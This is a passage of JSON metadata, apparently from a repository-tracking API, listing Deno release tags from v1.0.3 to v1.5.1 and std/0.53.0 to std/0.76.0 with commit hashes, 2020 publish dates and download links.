m/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0